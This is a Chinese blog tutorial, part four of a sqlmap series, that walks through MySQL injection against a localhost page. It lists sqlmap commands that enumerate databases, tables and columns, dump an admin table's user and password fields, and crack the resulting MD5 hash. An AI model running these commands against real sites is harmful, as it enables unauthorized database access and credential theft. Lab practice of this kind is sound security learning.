2. 程式人生 > >sqlmap之(四)----Mysql注入實戰

sqlmap之(四)----Mysql注入實戰

阿新 發佈:2019-01-18

(1) 查詢資料庫

sqlmap.py -u "http://localhost/sqls/index.php?id=123" --dbs


資料庫有8個。

(2) 通過第一步的資料庫查詢表(假如資料庫名為test)

sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test --tables


猜解出來裡面存在admin,sqltest兩個表。

(3) 通過2中的表得出列名(假如表為admin)

sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test -T admin --columns


(4) 獲取欄位的值(假如掃描出id,user,pwd欄位)

sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test -T admin -C "id,user,pwd" --dump


do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]

你想儲存的雜湊值來與其他工具最終進一步處理臨時檔案?   輸入"Y"

do you want to crack them via a dictionary-based attack? [Y/n/q]

你想通過基於字典的攻擊來破解他們嗎?  輸入"N"

馬上就得到了使用者名稱


與MD5的密碼: 3f230640b78d7e71ac5514e57935eb69 去破解下得到"qazxsw"


相關推薦

sqlmap()----Mysql注入實戰

(1) 查詢資料庫 sqlmap.py -u "http://localhost/sqls/index.php?id=123" --dbs 資料庫有8個。 (2) 通過第一步的資料庫查詢表(

LAMP、LNMP實戰搭建mysql(持續更新)

export 加密 base yum exe root with pat debug LAMP、LNMP實戰之四搭建mysql說明:服務器192.168.2.32 數據庫版本mysql5.5.32 cmake版本2.8.8yum install -y g

異步IO實戰:異步IO的單個處理和批量處理

c語言 異步io aio_write 異步IO由於它的非阻塞特性和強大的並發能力,非常適合用在要求高並發和高吞吐率的場景,比如用在提供SAN存儲的塊設備讀寫的實現上。和傳統IO模式類似,異步IO提供了一次提交一個IO請求的模式,還提供了一次提交一組IO請求的方式。下面將分別介紹這兩種模式的使用方法

MySQL 8.0.11 innodb cluster 運維管理手冊-msyqlbackup備份

安裝 目錄 沒有 host .cn directory eba history 全局 MySQL 8.0.11 innodb cluster 運維管理手冊之四-msyqlbackup備份 作者 方連超 Mysqlbackup 介紹 mysqlbackup是一個熱備份工具、也

DVWAphp+mysql手工注入

DVWA 頁面 輸入user ID ,輸入 1。看到如下資訊 在此點嘗試注入,輸入‘ ’ ’,判斷其注入型別。 初步判斷是數字型注入,在輸入 " 1 or 1=1 ",嘗試遍歷資料表 判斷字元型:" 1’ or ‘1’='1 " 利用 order b

Docker學習:使用docker安裝mysql,碰到了一個啟動的坑

Docker學習之四:使用docker安裝mysql,碰到了一個啟動的坑 第一步,從docker中拉取MySQL映象 $ sudo docker pull mysql $ sudo docker images 第二步,建立並啟動一個MySQL容器 $ sudo doc

mysql資料庫優化()-專案實戰

在flask專案中,防止隨著時間的流逝,資料庫資料越來越多,導致介面訪問資料庫速度變慢。所以自己填充資料進行測試及 mysql優化 1.插入資料: 通過指令碼,使用多程序,每100次提交資料 import multiprocessing import time from fla

Java Socket實戰 傳輸壓縮物件

分享一下我老師大神的人工智慧教程!零基礎,通俗易懂!http://blog.csdn.net/jiangjunshow 也歡迎大家轉載本篇文章。分享知識,造福人民,實現我們中華民族偉大復興!        

docker實戰使用mysql映象與wordpress映象搭建個人部落格

這次我打算寫一個實戰教程,以前寫的教程大多數是根據自己掌握的知識去寫的,並非實戰,這次試一下吧 首先docker這個東西我強烈推薦學習,因為真的很好用 下面先開始吧,廢話不多說,基礎的連線伺服器這些我就不囉嗦了,自個去百度吧,貌似我部落格也有 首先,使用yum安裝docker,命令如下

MySQL高可用方案 MHA keepalived 半同步複製

    [[email protected] ~]# cat /etc/mysql_mha/app1.cnf [server default]manager_log=/data/mysql_mha/app1-manager.logmanager_workdir=/data/m

spring4.1.8擴充套件實戰:感知spring容器變化(SmartLifecycle介面)

本章由以下幾部分組成: SmartLifecycle介面概覽; spring容器啟動與SmartLifecycle的關係; spring容器關閉與SmartLifecycle的關係; 關於Lifecycle和SmartLifecycle; 實戰SmartLi

DVWAsqlmap post登入過注入

**利用sqlmap過DVWA滲透環境中的注入題** 一開始利用常規語句進行注入會發現注入不了,看了語句提示會重定向到登入框,所以要對post掉登入這個過程。 教程看下面連結 https://blog.

《機器學習實戰——樸素貝葉斯

這裡寫自定義目錄標題 《機器學習實戰》之四——樸素貝葉斯 一. 數學部分 二. 準備資料階段 三. NB訓練函式 針對演算法部分的改進 四. NB分類函式 五. 測試NB分類函式 六. 使用樸素貝葉斯進行垃

(十)eos開發實戰dapp+遊戲--智慧合約資料庫multi_index多key

開言:此教材只是個人學習過程記錄自己理解和各種坑如有問題可提出修正,個人注重是開發動手,小白,寫也是為了重複加深印象,目標此教學習實現開發一個EOS小遊戲,堅持.......  環境: Mac+EOS-1.3.0  任務:multi_index多key   multi_

Apache CXF實戰 構建RESTful Web Service

                本文連結:http://blog.csdn.net/kongxx/article/details/7527115這篇文章介紹一下怎麼通過CXF來發布RESTful的Web Service.1. 首先是實體類,注意其中的@XmlRootElement註解package com.g

Android實戰技巧十九:Usb通訊USB Host

零 USB背景知識 USB是一種資料通訊方式,也是一種資料匯流排,而且是最複雜的匯流排之一。 硬體上,它是用插頭連線。一邊是公頭(plug),一邊是母頭(receptacle)。例如,PC上的插座就是母頭,USB裝置使用公頭與PC連線。 目前USB硬體介面

MongoDB實戰系列:mongodb副本集部署

簡述:副本集合(Replica Sets),是一個基於主/從複製機制的複製功能,但增加了自動故障轉移和恢復特性。一個叢集最多可以支援7個伺服器,並且任意節點都可以是主節點。所有的寫操作都被分發到主節點,而讀操作可以在任何節點上進行。 環境:CentOS 5.5 x64

Android實戰技巧十:Android5.1.1原始碼編譯與燒寫

購買Nexus手機的朋友大多是為了自己修改系統玩,再加上其較高的價效比,在開發者中還是廣受歡迎的。我的5太子被我升級到了6.0預覽版,玩的正嗨,捨不得換回到5.1時代了。不過鑑於距6.0原始碼釋出還有段日子,5.1的原始碼編譯與燒寫仍是主流,下面就記錄了整個過程

分散式Netty介紹與實戰()--Netty編解碼程式設計實戰

目錄 分散式之Netty介紹與實戰(一)–Java IO與NIO 分散式之Netty介紹與實戰(二)–Netty程式設計實踐 分散式之Netty介紹與實戰(三)–Netty執行緒模型解析 分散式之Netty介紹與實戰(四)–Netty編解碼程式設計實戰

Spring boot+Shiro+ spring MVC+swagger UI +Mybatis+mysql+Vue +Element UI vue 基本知識點概述

Vue.js是當下很火的一個JavaScript MVVM庫,它是以資料驅動和元件化的思想構建的。相比於Angular.js,Vue.js提供了更加簡潔、更易於理解的API,使得我們能夠快速地上手並使用Vue.js。Vue.js(讀音 /vjuː/, 類似於 view) 是一